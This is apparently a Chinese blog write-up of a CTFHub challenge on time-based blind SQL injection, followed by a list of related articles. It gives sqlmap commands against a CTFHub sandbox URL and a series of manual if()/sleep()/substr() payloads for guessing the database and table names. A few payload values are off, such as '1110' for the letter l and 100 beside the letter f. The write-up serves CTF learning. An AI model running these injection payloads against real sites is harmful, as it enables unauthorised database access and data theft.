CTFHub-sql注入之盲注

最新推荐文章于 2023-03-24 21:36:15 发布
最新推荐文章于 2023-03-24 21:36:15 发布
阅读量180 收藏
点赞数
分类专栏: 笔记 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_54525483/article/details/118941080
版权

 解题方法:

方法一:用sqlmap直接跑

方法二:手注(不建议)

方法三:写py脚本

用sqlmap直接跑

首先来看看基本的sqlmap命令吧


sqlmap -u url --current-user #获取当前用户名称 :
sqlmap -u url --current-db #获取当前数据库名称
sqlmap -u url -D 数据库名 --tables   #列出表名 : 
sqlmap -u url -D 数据库名 -T 表名 --columns #列出字段 
sqlmap -u url -D 数据库名 -T 表名 -C 字段名1,字段名2,…… --dump #获取字段内容

这里直接从获取库名开始了

打开sqlmap,输入命令:

sqlmap -u "http://challenge-1b076e041809ba5d.sandbox.ctfhub.com:10800/?id=1" --dbs

获取到的数据库有下面四个

 

其中前三个是mysql的配置库,显然我们应该爆第四个sqli

-D好像区分大小写,-d应该不行

sqlmap -u "http://challenge-1b076e041809ba5d.sandbox.ctfhub.com:10800/?id=1" -D sqli --tables

 获得上面两个表,接下来拿flag中的列和值

sqlmap -u "http://challenge-6d8fb2b2657c0800.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag --columns --dump

 

拿到flag。

手注(不建议)

首先看这个if(expr1,expr2,expr3)

含义是如果expr1是True,则返回expr2,否则返回expr3。

然后步骤如下:

1.猜数据库长度

2.猜数据库名

3.猜数据库的表数量

4.猜表名

5.列的数量

6.猜列长

7.猜列名

8.猜记录的条数

9.猜记录的长度

10.依次猜记录

这里用二分法猜测会比较快一点

1.猜数据库长度

1 and if(length(database())<10,sleep(3),1)#结果为真,二分,取5-10
1 and if(length(database())>5,sleep(3),1)#结果为假,取3-5
1 and if(length(database())>3,sleep(3),1)#为真,取4
1 and if(length(database())=4,sleep(3),1)#为真

页面3秒后响应的即为真

数据库长度为4

2.猜数据库名

随便找个点,ascii(n) 110   开始

substr(对象,开始点,截取长度)

1 and if(ascii(substr(database(),1,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),1,1))=115,sleep(3),1) #ascii(s)=115

1 and if(ascii(substr(database(),2,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),2,1))=113,sleep(3),1)	#ascii(q)=113

1 and if(ascii(substr(database(),3,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),3,1))=1110,sleep(3),1)	#ascii(l)=110

1 and if(ascii(substr(database(),4,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),4,1))=105,sleep(3),1)	#ascii(i)=105

得到数据库名sqli

3.猜数据库的表数量

二分法慢慢试,得到是2张表

1 and if((select count(table_name) from information_schema.tables
 where table_schema=database())=2,sleep(3),1)

4.猜表名

第一张表

1 and if(ascii(substr((select table_name from information_schema.tables
  where table_schema=database() limit 0,1),1,1))=110,sleep(3),1)  #ascii(n)=110,第一张表的第一个字母


1 and if(ascii(substr((select table_name from information_schema.tables
  where table_schema=database() limit 0,1),2,1))=101,sleep(3),1)  #ascii(e)=101,第一张表的第二个字母


1 and if(ascii(substr((select table_name from information_schema.tables
  where table_schema=database() limit 0,1),3,1))=119,sleep(3),1)  #ascii(w)=119,第一张表的第3个字母



1 and if(ascii(substr((select table_name from information_schema.tables
  where table_schema=database() limit 0,1),4,1))=115,sleep(3),1)  #ascii(s)=115,第一张表的第4个字母


news

第二张表

1 and if(ascii(substr((select table_name from information_schema.tables
  where table_schema=database() limit 1,1),1,1))=100,sleep(3),1)  #ascii(f)=102,第2张表的第1个字母

依次改变截取开始点,得到表名flag

5678910参考:
点我

py脚本(基于手注写)

Green_Hand_01
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
仅仅为了大家更好的学习!
CTF中几种通用的sql盲注手法和注入的一些tips
xuchen16的博客
10-09 2531
转载自:https://www.anquanke.com/post/id/160584 0x00 前言 在ctf比赛中难免会遇到一些比较有(keng)趣(die)的注入题,需要我们一步步的绕过waf和过滤规则,这种情况下大多数的注入方法都是盲注。然而在盲注过程中由于这些过滤规则不太好绕过,这时候就会无从下手,下面分享一下自己在比赛中总结几种比较通用的盲注手法和一些小tips,希望能在今后大家的...
CTFHUB-布尔盲注
Web学习之路
03-24 902
true 与 false
CTFHUB SQL注入——时间盲注 附自己写的脚本
wuuconix's blog
08-28 2124
介绍 时间盲注和上一篇布尔盲注一样都是盲注,都需要借助length,ascii,substr这些神奇的函数来猜测各项信息。它们的差别是猜测成功的依据。 布尔盲注的话如果查询有结果,一般会有一个success_flag,比如在上一题里就会返回query successfully。我的脚本也就是request返回值里有没有这个文本来判断是否查询成功的。 但是时间盲注不一样,它不光不给你查询的内容的回显,不给你报错信息,甚至连布尔盲注里的success_flag也不给你。也就是什么情况呢?你在那里查询,它什么信息
ctfsql注入——基于时间的盲注
wlllllianqing的博客
09-18 739
基于时间的盲注 原理:利用sleep()或benchmark()等函数让mysql执行时间变长,并结合判断条件if(expr1,expr2,expr3),然后通过页面的响应时间长短来判断语句返回的值是TRUE还是False,从而猜解一些未知的字段。 函数sleep(duration): 睡眠(暂停)时间为duration参数给定的秒数,然后返回0。若sleep()被中断,它会返回1。 select * from table where id=1 and sleep(3); select * from tab
CTFHub-web(sql布尔盲注)
分享与记录
07-22 4037
文章目录手工注入sqlmap注入总结 手工注入 1. 题目直接说明了是布尔注盲注,来简单验证一下 2. 既然如此,那么构造SQL语句,得到数据库长度 3. 数据库名称的长度为4,然后可以猜解出数据库的名称 得知当前数据库的第一个字母是s 然后依次得到数据库的第2个字母到第4个字母 最后对照ASCII表 得到当前数据库名称为sqli 4. 得到数据库中表的数量 前面只是演示如何得到数据库的名称 其实后面可以直接用database()来代替sqli 1 and (select count(t
SQL注入之基于布尔的盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔的盲注。下面来一起看看吧。
第16天:WEB漏洞-SQL注入之查询方式及报错盲注1
08-03
Access 偏移注入:解决列名获取不到的情况查看登陆框源代码的表单值或观察 URL 特征等也可以针对表或列获取不到的情况select 查询数据在网站应用中进行
10-sql注入-mysql注入1
08-03
1.路径符号:要用双斜杠 \\ ,或者 / 2.转换为十六进制数,这样就不需要引号了 1.报错显示 3.遗留文件 phpinfo info test php 5
php登录页面实现-SQL注入
03-07
php登录页面实现-SQL注入
CTFHub_技能树_Web之SQL注入——布尔盲注详细原理讲解_保姆级手把手讲解自动化布尔盲注脚本编写
Ho1aAs‘s Blog
11-19 6500
文章目录前言盲注思路盲注原理盲注常用函数完 前言 布尔盲注,与普通注入的区别在于“盲注”。在注入语句后,盲注不是返回查询到的结果,而只是返回查询是否成功,即:返回查询语句的布尔值。因此,盲注就是穷举试错,由于只有返回的布尔值,往往查询非常复杂,一般使用脚本来穷举试错 盲注思路 由于对数据库的信息了解甚少,盲注需要考虑多种情况,一般思路如下: 爆数据库名长度 根据库名长度爆数据库名 对当前数据库爆数据表数量 根据表数量爆数据表名长度 根据表名长度爆数据表名 对所有数据表爆列数量 根据列数量爆列名长度 根据列
ctf各种sql盲注脚本
qq_51862722的博客
08-17 2707
以下的几个脚本都是自己写的(有参考别的大佬),代码可能不是最精简,但是还算顺眼 核心算法都是二分法,不推荐时间盲注(速度硬伤) 脚本payload参考题目:[第一章 web入门]SQL注入-2 / 极客大挑战finilysql(buuctf) 1.通过post传参的脚本 用的时候修改post参数和个数 1.1 基于异或盲注,布尔盲注等: import requests url = 'http://736aa374-b497-441f-9b6a-a1c91f9b182b.node4.buuoj.cn:
php基于错误的盲注,从一道CTF代码审计题看SQL盲注
weixin_42299427的博客
04-14 509
文章难易度【★★★】文章阅读点/知识点: PHP代码审计、MySQL盲注CTF技巧文章作者: 0h1in9e本文参与i春秋社区原创文章奖励计划,未经许可禁止转载0x01前言笔者在上个月参加一个CTF比赛的时候,遇到了一个PHP代码审计类的题目。具体地来说是关于一道SQL盲注类的题目。做了这道题之后,对SQL盲注有了更深入的了解,今天给大家分享下这道CTF题目以及解法,以及透过这个题目聊聊盲注。0...
数据库
c353796317的专栏
11-22 266
Oracle 用用户区分不同项目使用的数据库。 Mysql   用数据库区分不同项目使用的数据库。
CTF】关于SQL盲注的细节
publicStr的博客
11-29 2575
目录: 0x01 CTF题目中关于load_file()、char()、hex()、unhex()、like、过滤空格、过滤引号及相关问题 0x02 某简单题目中关于order by利用排序布尔盲注题目及源码 0x03 某CTF题解,盲注+泄露+反序列化       0x01 CTF题目中关于load_file()、char()、hex()、unhex()、like、过滤空格、过滤引...
CTF入门笔记之SQL注入
qq_37410729的博客
11-01 2889
sql注入
CTFHub(布尔盲注 判断是否,无回显)
sGanYu
08-06 1949
盲注主要分为两种,一种为时间类型盲注,一种为布尔类型盲注 判断是否是布尔类型的:当一个界面存在注入,但是没有显示位,没有SQL语句执行错误信息,由于布尔类型的注入只会告知是或者不是,所以只能通过页面返回的对与错来进行一个SQL的注入 【 column_name:列的名称 Information_schema.columns:表示所有的列的信息 Information_schema:表示所有信息,包括库、表、列 Information_schema.tables:表示所有的表的信息 tabl
ctf-web-sql注入
热门推荐
god_001的博客
05-03 1万+
题目链接:跳转提示 打开网页,一个登陆页面,根据题是本题题型是基于布尔的SQL盲注 首先在用户名处输入admin 得到结果: 即密码确为admin,而如果不输入用户名直接输入密码,发现报错 可见后台是先判断用户名是否正确存在,当用户名正确后再判断密码是否正确。 经测试发现,当出现'空格符','=','and'等字符时,发现会报错显示:‘illegal character’,即知道这些字符会被过滤,可以用括号来避免空格符的使用,用<>(大于或小于)来避免'='的使用 尝试输入
CTF 入坑新生赛 Misc 流量分析1 (SQL盲注的分析)
Landasika的博客
11-01 3630
本人小白入门,不到之处请大侠指点!!! 解题预备知识 wireshark的使用、SQL盲注基本原理 大佬的一片关于流量分析SQL盲注的题解: 某行业攻防培训-----流量分析之-----sql盲注_qwsn-CSDN博客 关于SQL盲注的原理: SQL盲注(原理概述、分类)_小赵同学的博客-CSDN博客_sql盲注原理 解题思路 用wireshark打开文件,观察后可以发现,这个是一个SQL盲注的流量分析题。 ​​ 根据SQL盲注的原理,我们直接搜索1,1 2,1 ...
ctfhub sql注入
最新发布
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值